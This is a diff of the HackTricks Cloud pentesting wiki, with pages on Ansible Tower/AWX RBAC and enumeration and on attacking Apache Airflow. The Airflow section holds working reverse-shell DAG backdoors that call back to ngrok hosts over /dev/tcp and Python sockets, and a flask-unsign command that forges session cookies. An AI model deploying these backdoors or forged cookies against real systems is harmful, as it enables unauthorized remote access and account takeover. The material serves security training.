- [AWS - CodeBuild Unauthenticated Access](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-codebuild-unauthenticated-access/README.md)
- [AWS - DocumentDB Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-documentdb-enum/README.md)
- [AWS - DynamoDB Unauthenticated Access](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-dynamodb-unauthenticated-access/README.md)
- [AWS - EC2 Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum/README.md)
- [AWS - ECR Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum/README.md)
- [AWS - ECS Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecs-unauthenticated-enum/README.md)
- [AWS - Elastic Beanstalk Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum/README.md)
- [AWS - Elasticsearch Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elasticsearch-unauthenticated-enum/README.md)
- [AWS - IAM & STS Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum/README.md)
- [AWS - Identity Center & SSO Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum/README.md)
- [AWS - IoT Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iot-unauthenticated-enum/README.md)
- [AWS - Kinesis Video Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-kinesis-video-unauthenticated-enum/README.md)
- [AWS - Lambda Unauthenticated Access](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access/README.md)
- [AWS - Media Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-media-unauthenticated-enum/README.md)
- [AWS - MQ Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum/README.md)
- [AWS - MSK Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-msk-unauthenticated-enum/README.md)
- [AWS - RDS Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum/README.md)
- [AWS - Redshift Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-redshift-unauthenticated-enum/README.md)
- [AWS - SageMaker Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sagemaker-unauthenticated-enum/README.md)
- [AWS - SQS Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum/README.md)
- [AWS - SNS Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sns-unauthenticated-enum/README.md)
- [AWS - S3 Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum/README.md)
- [Azure Pentesting](pentesting-cloud/azure-security/README.md)
- [Az - Basic Information](pentesting-cloud/azure-security/az-basic-information/README.md)
- [Az Federation Abuse](pentesting-cloud/azure-security/az-basic-information/az-federation-abuse.md)
- [Az - Services](pentesting-cloud/azure-security/az-services/README.md)
- [Az - Entra ID (AzureAD) & Azure IAM](pentesting-cloud/azure-security/az-services/az-azuread.md)
- [Az - ACR](pentesting-cloud/azure-security/az-services/az-acr.md)
- [Az - API Management](pentesting-cloud/azure-security/az-services/az-api-management.md)
- [Az - Application Proxy](pentesting-cloud/azure-security/az-services/az-application-proxy.md)
- [Az - ARM Templates / Deployments](pentesting-cloud/azure-security/az-services/az-arm-templates.md)
- [Az - Automation Accounts](pentesting-cloud/azure-security/az-services/az-automation-accounts.md)
- [Az - Azure App Services](pentesting-cloud/azure-security/az-services/az-app-services.md)
- [Az - AI Foundry](pentesting-cloud/azure-security/az-services/az-ai-foundry.md)
- [Az - Cloud Shell](pentesting-cloud/azure-security/az-services/az-cloud-shell.md)
- [Az - Container Registry](pentesting-cloud/azure-security/az-services/az-container-registry.md)
- [Az - Container Instances, Apps & Jobs](pentesting-cloud/azure-security/az-services/az-container-instances-apps-jobs.md)
@@ -509,7 +458,6 @@
- [Az - Domain Services](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-domain-services.md)
- [Az - Federation](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-federation.md)
- [Az - Hybrid Identity Misc Attacks](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-hybrid-identity-misc-attacks.md)
- [Az - Exchange Hybrid Impersonation (ACS Actor Tokens)](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-exchange-hybrid-impersonation.md)
- [Az - Local Cloud Credentials](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.md)
- [Az - Pass the Certificate](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-certificate.md)
- [Az - Pass the Cookie](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-cookie.md)
@@ -517,7 +465,6 @@
- [Az - PTA - Pass-through Authentication](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pta-pass-through-authentication.md)
- [Az - Seamless SSO](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-seamless-sso.md)
- [Az - Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/README.md)
- [Az API Management Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-api-management-post-exploitation.md)
- [Az Azure Ai Foundry Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-azure-ai-foundry-post-exploitation.md)
- [Az - Blob Storage Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.md)
- [Az - CosmosDB Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.md)
@@ -535,8 +482,6 @@
- [Az - VMs & Network Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.md)
- [Az - Privilege Escalation](pentesting-cloud/azure-security/az-privilege-escalation/README.md)
- [Az - Azure IAM Privesc (Authorization)](pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.md)
- [Az - AI Foundry Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-ai-foundry-privesc.md)
- [Az - API Management Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-api-management-privesc.md)
- [Az - App Services Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.md)
- [Az - Automation Accounts Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-automation-accounts-privesc.md)
- [Az - Container Registry Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-container-registry-privesc.md)

View File

@@ -1,14 +1,18 @@
> [!TIP]
> Learn & practice AWS Hacking:<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> Learn & practice GCP Hacking: <img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)<img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> Learn & practice Az Hacking: <img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training Azure Red Team Expert (AzRTE)**](https://training.hacktricks.xyz/courses/azrte)<img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
>
> <details>
>
> <summary>Support HackTricks</summary>
>
> - Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
> - **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
> - **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
>
> </details>

BIN
src/files/empty.zip Normal file

Binary file not shown.

BIN
src/pdfs/AWS_Services.pdf Normal file

Binary file not shown.

View File

@@ -2,61 +2,62 @@
{{#include ../banners/hacktricks-training.md}}
## Basic Information
**Ansible Tower**, or its open-source version [**AWX**](https://github.com/ansible/awx), is also known as **Ansible's user interface, dashboard, and REST API**. With **role-based access control**, job scheduling, and graphical inventory management, you can manage your Ansible infrastructure from a modern UI. Tower's REST API and command-line interface make it simple to integrate into current tools and workflows.
**Automation Controller** is a newer version of Ansible Tower with more capabilities.
### Differences
According to [**this**](https://blog.devops.dev/ansible-tower-vs-awx-under-the-hood-65cfec78db00), the main differences between Ansible Tower and AWX are the support received and that Ansible Tower has additional features such as role-based access control, support for custom APIs, and user-defined workflows.
### Tech Stack
- **Web Interface**: This is the graphical interface where users can manage inventories, credentials, templates, and jobs. It's designed to be intuitive and provides visualizations to help with understanding the state and results of your automation jobs.
- **REST API**: Everything you can do in the web interface, you can also do via the REST API. This means you can integrate AWX/Tower with other systems or script actions that you'd typically perform in the interface.
- **Database**: AWX/Tower uses a database (typically PostgreSQL) to store its configuration, job results, and other necessary operational data.
- **RabbitMQ**: This is the messaging system used by AWX/Tower to communicate between the different components, especially between the web service and the task runners.
- **Redis**: Redis serves as a cache and a backend for the task queue.
### Logical Components
- **Inventories**: An inventory is a **collection of hosts (or nodes)** against which **jobs** (Ansible playbooks) can be **run**. AWX/Tower allows you to define and group your inventories and also supports dynamic inventories which can **fetch host lists from other systems** like AWS, Azure, etc.
- **Projects**: A project is essentially a **collection of Ansible playbooks** sourced from a **version control system** (like Git) to pull the latest playbooks when needed.
- **Templates**: Job templates define **how a particular playbook will be run**, specifying the **inventory**, **credentials**, and other **parameters** for the job.
- **Credentials**: AWX/Tower provides a secure way to **manage and store secrets, such as SSH keys, passwords, and API tokens**. These credentials can be associated with job templates so that playbooks have the necessary access when they run.
- **Task Engine**: This is where the magic happens. The task engine is built on Ansible and is responsible for **running the playbooks**. Jobs are dispatched to the task engine, which then runs the Ansible playbooks against the designated inventory using the specified credentials.
- **Schedulers and Callbacks**: These are advanced features in AWX/Tower that allow **jobs to be scheduled** to run at specific times or triggered by external events.
- **Notifications**: AWX/Tower can send notifications based on the success or failure of jobs. It supports various means of notifications such as emails, Slack messages, webhooks, etc.
- **Ansible Playbooks**: Ansible playbooks are configuration, deployment, and orchestration tools. They describe the desired state of systems in an automated, repeatable way. Written in YAML, playbooks use Ansible's declarative automation language to describe configurations, tasks, and steps that need to be executed.
### Job Execution Flow
1. **User Interaction**: A user can interact with AWX/Tower either through the **Web Interface** or the **REST API**. These provide front-end access to all the functionalities offered by AWX/Tower.
2. **Job Initiation**:
- The user, via the Web Interface or API, initiates a job based on a **Job Template**.
- The Job Template includes references to the **Inventory**, **Project** (containing the playbook), and **Credentials**.
- Upon job initiation, a request is sent to the AWX/Tower backend to queue the job for execution.
3. **Job Queuing**:
- **RabbitMQ** handles the messaging between the web component and the task runners. Once a job is initiated, a message is dispatched to the task engine using RabbitMQ.
- **Redis** acts as the backend for the task queue, managing queued jobs awaiting execution.
4. **Job Execution**:
- The **Task Engine** picks up the queued job. It retrieves the necessary information from the **Database** about the job's associated playbook, inventory, and credentials.
- Using the retrieved Ansible playbook from the associated **Project**, the Task Engine runs the playbook against the specified **Inventory** nodes using the provided **Credentials**.
- As the playbook runs, its execution output (logs, facts, etc.) gets captured and stored in the **Database**.
5. **Job Results**:
- Once the playbook finishes running, the results (success, failure, logs) are saved to the **Database**.
- Users can then view the results through the Web Interface or query them via the REST API.
- Based on job outcomes, **Notifications** can be dispatched to inform users or external systems about the job's status. Notifications could be emails, Slack messages, webhooks, etc.
6. **External Systems Integration**:
- **Inventories** can be dynamically sourced from external systems, allowing AWX/Tower to pull in hosts from sources like AWS, Azure, VMware, and more.
- **Projects** (playbooks) can be fetched from version control systems, ensuring the use of up-to-date playbooks during job execution.
- **Schedulers and Callbacks** can be used to integrate with other systems or tools, making AWX/Tower react to external triggers or run jobs at predetermined times.
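The whole flow above can be driven over the REST API. A minimal sketch of launching a job template and reading its status — the HTTP transport is injected as a callable so the logic is transport-agnostic (the endpoint paths follow the `/api/v2/` convention; wire it to a real instance with a thin `requests` wrapper):

```python
def launch_job_template(post, template_id):
    """Queue a job from a job template (steps 2-3 of the flow) and return the job id.

    `post` is an injected callable, e.g. a thin wrapper around an authenticated
    requests session, taking a path and returning the parsed JSON response.
    """
    job = post(f"/api/v2/job_templates/{template_id}/launch/")
    return job["job"]


def job_status(get, job_id):
    """Read the job result (step 5) from the jobs endpoint."""
    return get(f"/api/v2/jobs/{job_id}/")["status"]
```

In practice `post`/`get` would send the `Authorization: Bearer <token>` header and raise on non-2xx responses.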
### AWX lab creation for testing
[**Following the docs**](https://github.com/ansible/awx/blob/devel/tools/docker-compose/README.md) it's possible to use docker-compose to run AWX:
```bash
git clone -b x.y.z https://github.com/ansible/awx.git # Get in x.y.z the latest release version
@@ -82,78 +83,79 @@ docker exec -ti tools_awx_1 awx-manage createsuperuser
# Load demo data
docker exec tools_awx_1 awx-manage create_preload_data
```
## RBAC
### Supported roles
The most privileged role is called **System Administrator**. Anyone with this role can **modify anything**.
**白盒安全** 审查的角度来看,您需要 **System Auditor role**,该角色允许 **查看所有系统数据** 但不能进行任何更改。另一个选择是获取 **Organization Auditor role**,但获取前者会更好。
From a **white box security** review, you would need the **System Auditor role**, which allow to **view all system data** but cannot make any changes. Another option would be to get the **Organization Auditor role**, but it would be better to get the other one.
<details>
<summary>Expand this to get detailed description of available roles</summary>
1. **System Administrator**:
- This is the superuser role with permissions to access and modify any resource in the system.
- They can manage all organizations, teams, projects, inventories, job templates, etc.
2. **System Auditor**:
- Users with this role can view all system data but cannot make any changes.
- This role is designed for compliance and oversight.
3. **Organization Roles**:
- **Admin**: Full control over the organization's resources.
- **Auditor**: View-only access to the organization's resources.
- **Member**: Basic membership in an organization without any specific permissions.
- **Execute**: Can run job templates within the organization.
- **Read**: Can view the organization's resources.
4. **Project Roles**:
- **Admin**: Can manage and modify the project.
- **Use**: Can use the project in a job template.
- **Update**: Can update project using SCM (source control).
5. **Inventory Roles**:
- **Admin**: Can manage and modify the inventory.
- **Ad Hoc**: Can run ad hoc commands on the inventory.
- **Update**: Can update the inventory source.
- **Use**: Can use the inventory in a job template.
- **Read**: View-only access.
6. **Job Template Roles**:
- **Admin**: Can manage and modify the job template.
- **Execute**: Can run the job.
- **Read**: View-only access.
7. **Credential Roles**:
- **Admin**: Can manage and modify the credentials.
- **Use**: Can use the credentials in job templates or other relevant resources.
- **Read**: View-only access.
8. **Team Roles**:
- **Member**: Part of the team but without any specific permissions.
- **Admin**: Can manage the team's members and associated resources.
9. **Workflow Roles**:
- **Admin**: Can manage and modify the workflow.
- **Execute**: Can run the workflow.
- **Read**: View-only access.
</details>
## Enumeration & Attack-Path Mapping with AnsibleHound
`AnsibleHound` is an open-source BloodHound *OpenGraph* collector written in Go that turns a **read-only** Ansible Tower/AWX/Automation Controller API token into a complete permission graph ready to be analysed inside BloodHound (or BloodHound Enterprise).
### Why is this useful?
1. The Tower/AWX REST API is extremely rich and exposes **every object and RBAC relationship** your instance knows about.
2. Even with the lowest privilege (**Read**) token it is possible to recursively enumerate all accessible resources (organisations, inventories, hosts, credentials, projects, job templates, users, teams…).
3. When the raw data is converted to the BloodHound schema you obtain the same *attack-path* visualisation capabilities that are so popular in Active Directory assessments but now directed at your CI/CD estate.
Security teams (and attackers!) can therefore:
* Quickly understand **who can become admin of what**.
* Identify **credentials or hosts that are reachable** from an unprivileged account.
* Chain multiple “Read ➜ Use ➜ Execute ➜ Admin” edges to obtain full control over the Tower instance or the underlying infrastructure.
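Chaining those edges is just a reachability question over the collected permission graph. A toy sketch (the node/edge names mimic the AT* schema, but the data is illustrative, not AnsibleHound's actual output format):

```python
from collections import deque


def reachable(edges, start):
    """BFS over directed privilege edges: everything `start` can reach."""
    graph = {}
    for src, _rel, dst in edges:
        graph.setdefault(src, []).append(dst)
    seen, queue = {start}, deque([start])
    while queue:
        node = queue.popleft()
        for nxt in graph.get(node, []):
            if nxt not in seen:
                seen.add(nxt)
                queue.append(nxt)
    seen.discard(start)
    return seen


# Toy graph: Execute on a template leads to its credential, which admins a host
edges = [
    ("user:alice", "ATExecute", "template:deploy"),
    ("template:deploy", "ATUses", "credential:ssh-key"),
    ("credential:ssh-key", "ATAdmin", "host:prod-db"),
]
```

BloodHound performs this kind of traversal (with typed edges and path weights) for you; the sketch just shows why a chain of individually harmless grants adds up to host takeover.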
### Prerequisites
* Ansible Tower / AWX / Automation Controller reachable over HTTPS.
* A user API token scoped to **Read** only (created from *User Details → Tokens → Create Token → scope = Read*).
* Go ≥ 1.20 to compile the collector (or use the pre-built binaries).
### Building & Running
```bash
# Compile the collector
cd collector
@@ -162,7 +164,7 @@ go build . -o build/ansiblehound
# Execute against the target instance
./build/ansiblehound -u "https://tower.example.com/" -t "READ_ONLY_TOKEN"
```
Internally AnsibleHound performs *paginated* `GET` requests against (at least) the following endpoints and automatically follows the `related` links returned in every JSON object:
```
/api/v2/organizations/
/api/v2/inventories/
@@ -173,32 +175,37 @@ go build . -o build/ansiblehound
/api/v2/users/
/api/v2/teams/
```
All collected pages are merged into a single JSON file on disk (default: `ansiblehound-output.json`).
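The pagination handling can be sketched as follows — each Tower/AWX API page carries a `results` list and a `next` URL (DRF-style), so a collector just keeps following `next` until it is null. The fetcher is injected, so no live instance is needed:

```python
def collect_all(fetch, endpoint):
    """Follow DRF-style pagination: each page has `results` and a `next` URL."""
    items, url = [], endpoint
    while url:
        page = fetch(url)
        items.extend(page.get("results", []))
        url = page.get("next")  # None on the last page
    return items
```

This is also the access pattern a defender would look for: many sequential `GET`s walking `?page=N` across every list endpoint.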
### BloodHound Transformation
The raw Tower data is then **transformed to BloodHound OpenGraph** using custom nodes prefixed with `AT` (Ansible Tower):
* `ATOrganization`, `ATInventory`, `ATHost`, `ATJobTemplate`, `ATProject`, `ATCredential`, `ATUser`, `ATTeam`
And edges modelling relationships / privileges:
* `ATContains`, `ATUses`, `ATExecute`, `ATRead`, `ATAdmin`
The result can be imported straight into BloodHound:
```bash
neo4j stop # if BloodHound CE is running locally
bloodhound-import ansiblehound-output.json
```
Optionally you can upload **custom icons** so that the new node types are visually distinct:
```bash
python3 scripts/import-icons.py "https://bloodhound.example.com" "BH_JWT_TOKEN"
```
### Defensive & Offensive Considerations
* A *Read* token is normally considered harmless but still leaks the **full topology and every credential's metadata**. Treat it as sensitive!
* Enforce **least privilege** and rotate / revoke unused tokens.
* Monitor the API for excessive enumeration (multiple sequential `GET` requests, high pagination activity).
* From an attacker perspective this is a perfect *initial foothold → privilege escalation* technique inside the CI/CD pipeline.
## References
* [AnsibleHound BloodHound Collector for Ansible Tower/AWX](https://github.com/TheSleekBoyCompany/AnsibleHound)
* [BloodHound OSS](https://github.com/BloodHoundAD/BloodHound)
{{#include ../banners/hacktricks-training.md}}

View File

@@ -2,21 +2,22 @@
{{#include ../../banners/hacktricks-training.md}}
### Basic Information
[**Apache Airflow**](https://airflow.apache.org) serves as a platform for **orchestrating and scheduling data pipelines or workflows**. The term "orchestration" in the context of data pipelines signifies the process of arranging, coordinating, and managing complex data workflows originating from various sources. The primary purpose of these orchestrated data pipelines is to furnish processed and consumable data sets. These data sets are extensively utilized by a myriad of applications, including but not limited to business intelligence tools, data science and machine learning models, all of which are foundational to the functioning of big data applications.
Basically, Apache Airflow will allow you to **schedule the execution of code when something** (event, cron) **happens**.
### Local Lab
#### Docker-Compose
You can use the **docker-compose config file from** [**https://raw.githubusercontent.com/apache/airflow/main/docs/apache-airflow/start/docker-compose.yaml**](https://raw.githubusercontent.com/apache/airflow/main/docs/apache-airflow/start/docker-compose.yaml) to launch a complete Apache Airflow docker environment. (If you are on macOS, make sure to give at least 6GB of RAM to the docker VM).
#### Minikube
One easy way to **run Apache Airflow** is to run it **with minikube**:
```bash
helm repo add airflow-stable https://airflow-helm.github.io/charts
helm repo update
@@ -26,9 +27,10 @@ helm install airflow-release airflow-stable/airflow
# Use this command to delete it
helm delete airflow-release
```
### Airflow Configuration
Airflow might store **sensitive information** in its configuration or you can find weak configurations in place:
{{#ref}}
airflow-configuration.md
@@ -36,62 +38,65 @@ airflow-configuration.md
### Airflow RBAC
Before start attacking Airflow you should understand **how permissions work**:
{{#ref}}
airflow-rbac.md
{{#endref}}
### Attacks
#### Web Console Enumeration
If you have **access to the web console** you might be able to access some or all of the following information:
- **Variables** (Custom sensitive information might be stored here)
- **Connections** (Custom sensitive information might be stored here)
- Access them in `http://<airflow>/connection/list/`
- [**Configuration**](#airflow-configuration) (Sensitive information like the **`secret_key`** and passwords might be stored here)
- List **users & roles**
- **Code of each DAG** (which might contain interesting info)
#### Retrieve Variables Values
Variables can be stored in Airflow so the **DAGs** can **access** their values. It's similar to secrets of other platforms. If you have **enough permissions** you can access them in the GUI in `http://<airflow>/variable/list/`.\
Airflow by default will show the value of the variable in the GUI, however, according to [**this**](https://marclamberti.com/blog/variables-with-apache-airflow/) it's possible to set a **list of variables** whose **value** will appear as **asterisks** in the **GUI**.
![](<../../images/image (164).png>)
However, these **values** can still be **retrieved** via **CLI** (you need to have DB access), **arbitrary DAG** execution, **API** accessing the variables endpoint (the API needs to be activated), and **even the GUI itself!**\
To access those values from the GUI just **select the variables** you want to access and **click on Actions -> Export**.\
Another way is to perform a **bruteforce** to the **hidden value** using the **search filtering** it until you get it:
![](<../../images/image (152).png>)
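The filter trick works because the search box acts as a matching oracle: a query only shows the row when the hidden value matches it. A toy sketch of recovering a value character by character, assuming the filter behaves as a starts-with match (the oracle and charset are illustrative; in the real GUI each `oracle` call is one filtered search):

```python
import string


def recover_secret(oracle, charset=string.ascii_lowercase + string.digits, max_len=64):
    """Recover a hidden value against a starts-with oracle.

    `oracle(guess)` returns True when the hidden value starts with `guess`,
    modelling a UI search filter that only shows a row on a match.
    """
    known = ""
    for _ in range(max_len):
        for c in charset:
            if oracle(known + c):
                known += c
                break
        else:
            break  # no character extends the prefix: value fully recovered
    return known
```

The cost is linear in the value length times the charset size, i.e. entirely practical against the GUI.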
#### Privilege Escalation
If the **`expose_config`** configuration is set to **True**, anyone from the **role User** and **upwards** can **read** the **config in the web**. This config exposes the **`secret_key`**, which means any user with this valid key can **create their own signed cookie to impersonate any other user account**.
```bash
flask-unsign --sign --secret '<secret_key>' --cookie "{'_fresh': True, '_id': '12345581593cf26619776d0a1e430c412171f4d12a58d30bef3b2dd379fc8b3715f2bd526eb00497fcad5e270370d269289b65720f5b30a39e5598dad6412345', '_permanent': True, 'csrf_token': '09dd9e7212e6874b104aad957bbf8072616b8fbc', 'dag_status_filter': 'all', 'locale': 'en', 'user_id': '1'}"
```
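The forgery works because session cookies are only integrity-protected, not encrypted: the payload is readable by anyone, and only the signature depends on `secret_key`. A simplified stdlib illustration of the principle (the real implementation uses `itsdangerous` with timestamps and key derivation, so this is conceptual, not a drop-in forger — `flask-unsign` above does the real thing):

```python
import base64
import hashlib
import hmac
import json


def sign(secret_key, session_dict):
    # Serialize the (non-secret) payload and append a keyed MAC over it
    payload = base64.urlsafe_b64encode(json.dumps(session_dict).encode())
    mac = hmac.new(secret_key.encode(), payload, hashlib.sha256).hexdigest()
    return payload.decode() + "." + mac


def verify(secret_key, cookie):
    payload, mac = cookie.rsplit(".", 1)
    expected = hmac.new(secret_key.encode(), payload.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(mac, expected):
        raise ValueError("bad signature")
    return json.loads(base64.urlsafe_b64decode(payload))


# Knowing secret_key, an attacker can mint a cookie for any user_id
forged = sign("leaked-secret", {"user_id": "1", "_fresh": True})
```

Without the key the MAC cannot be recomputed, which is exactly why leaking `secret_key` through `expose_config` is a full account-takeover primitive.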
#### DAG Backdoor (RCE in Airflow worker)
If you have **write access** to the place where the **DAGs are saved**, you can just **create one** that will send you a **reverse shell.**\
Note that this reverse shell is going to be executed inside an **airflow worker container**:
```python
import pendulum
from airflow import DAG
from airflow.operators.bash import BashOperator
with DAG(
    dag_id='rev_shell_bash',
    schedule_interval='0 0 * * *',
    start_date=pendulum.datetime(2021, 1, 1, tz="UTC"),
) as dag:
    run = BashOperator(
        task_id='run',
        bash_command='bash -i >& /dev/tcp/8.tcp.ngrok.io/11433 0>&1',
    )
```
```python
@@ -100,66 +105,74 @@ from airflow import DAG
from airflow.operators.python import PythonOperator
def rs(rhost, port):
    s = socket.socket()
    s.connect((rhost, port))
    [os.dup2(s.fileno(),fd) for fd in (0,1,2)]
    pty.spawn("/bin/sh")
with DAG(
    dag_id='rev_shell_python',
    schedule_interval='0 0 * * *',
    start_date=pendulum.datetime(2021, 1, 1, tz="UTC"),
) as dag:
    run = PythonOperator(
        task_id='rs_python',
        python_callable=rs,
        op_kwargs={"rhost":"8.tcp.ngrok.io", "port": 11433}
    )
```
#### DAG Backdoor (RCE in Airflow scheduler)
If you set something to be **executed in the root of the code**, at the moment of this writing, it will be **executed by the scheduler** a couple of seconds after it is placed inside the DAGs folder.
```python
import pendulum, socket, os, pty
from airflow import DAG
from airflow.operators.python import PythonOperator
def rs(rhost, port):
    s = socket.socket()
    s.connect((rhost, port))
    [os.dup2(s.fileno(),fd) for fd in (0,1,2)]
    pty.spawn("/bin/sh")
rs("2.tcp.ngrok.io", 14403)
with DAG(
    dag_id='rev_shell_python2',
    schedule_interval='0 0 * * *',
    start_date=pendulum.datetime(2021, 1, 1, tz="UTC"),
) as dag:
    run = PythonOperator(
        task_id='rs_python2',
        python_callable=rs,
        op_kwargs={"rhost":"2.tcp.ngrok.io", "port": 144}
    )
```
#### DAG Creation

If you manage to **compromise a machine inside the DAG cluster**, you can create new **DAG scripts** in the `dags/` folder and they will be **replicated in the rest of the machines** inside the DAG cluster.

#### DAG Code Injection

When you execute a DAG from the GUI you can **pass arguments** to it.\
Therefore, if the DAG is not properly coded it could be **vulnerable to Command Injection.**\
That is what happened in this CVE: [https://www.exploit-db.com/exploits/49927](https://www.exploit-db.com/exploits/49927)

All you need to know to **start looking for command injections in DAGs** is that **parameters** are **accessed** with the code **`dag_run.conf.get("param_name")`**.

Moreover, the same vulnerability might occur with **variables** (note that with enough privileges you could **control the value of the variables** in the GUI). Variables are **accessed with**:
```python
from airflow.models import Variable
[...]
foo = Variable.get("foo")
```
If they are used, for example, inside a bash command, you could perform a command injection.
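To see why this pattern is dangerous, here is a minimal self-contained sketch (no Airflow required; `user_param` stands in for whatever `dag_run.conf.get(...)` would return):

```python
import shlex
import subprocess

# Stand-in for an attacker-controlled value from dag_run.conf.get("cmd")
user_param = "hello; echo INJECTED"

# Vulnerable pattern: the parameter is interpolated into a shell command string
vulnerable = f"echo {user_param}"
out = subprocess.run(vulnerable, shell=True, capture_output=True, text=True).stdout
# The injected `echo INJECTED` ran as a second shell command
print(out.splitlines())  # ['hello', 'INJECTED']

# Safer pattern: quote the parameter so the shell sees a single argument
safe = f"echo {shlex.quote(user_param)}"
out2 = subprocess.run(safe, shell=True, capture_output=True, text=True).stdout
print(out2.splitlines())  # ['hello; echo INJECTED']
```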
{{#include ../../banners/hacktricks-training.md}}

# Airflow Configuration
{{#include ../../banners/hacktricks-training.md}}
## Configuration File
**Apache Airflow** generates a **config file** in all the airflow machines called **`airflow.cfg`** in the home of the airflow user. This config file contains configuration information and **might contain interesting and sensitive information.**
**There are two ways to access this file: By compromising some airflow machine, or accessing the web console.**
Note that the **values inside the config file** **might not be the ones used**, as you can overwrite them setting env variables such as `AIRFLOW__WEBSERVER__EXPOSE_CONFIG: 'true'`.
If you have access to the **config file in the web server**, you can check the **real running configuration** in the same page the config is displayed.\
If you have **access to some machine inside the airflow env**, check the **environment**.
Some interesting values to check when reading the config file:
### \[api]
- **`access_control_allow_headers`**: This indicates the **allowed** **headers** for **CORS**
- **`access_control_allow_methods`**: This indicates the **allowed methods** for **CORS**
- **`access_control_allow_origins`**: This indicates the **allowed origins** for **CORS**
- **`auth_backend`**: [**According to the docs**](https://airflow.apache.org/docs/apache-airflow/stable/security/api.html) a few options can be in place to configure who can access the API:
- `airflow.api.auth.backend.deny_all`: **By default nobody** can access the API
- `airflow.api.auth.backend.default`: **Everyone can** access it without authentication
- `airflow.api.auth.backend.kerberos_auth`: To configure **kerberos authentication**
- `airflow.api.auth.backend.basic_auth`: For **basic authentication**
- `airflow.composer.api.backend.composer_auth`: Uses composer's authentication (GCP) (from [**here**](https://cloud.google.com/composer/docs/access-airflow-api)).
- `composer_auth_user_registration_role`: This indicates the **role** the **composer user** will get inside **airflow** (**Op** by default).
- You can also **create your own authentication** method with python.
- **`google_key_path`:** Path to the **GCP service account key**
### **\[atlas]**
- **`password`**: Atlas password
- **`username`**: Atlas username
### \[celery]
- **`flower_basic_auth`**: Credentials (_user1:password1,user2:password2_)
- **`result_backend`**: Postgres URL which may contain **credentials**.
- **`ssl_cacert`**: Path to the cacert
- **`ssl_cert`**: Path to the cert
- **`ssl_key`**: Path to the key
### \[core]
- **`dag_discovery_safe_mode`**: Enabled by default. When discovering DAGs, ignore any files that don't contain the strings `DAG` and `airflow`.
- **`fernet_key`**: Key to store encrypted variables (symmetric)
- **`hide_sensitive_var_conn_fields`**: Enabled by default, hide sensitive info of connections.
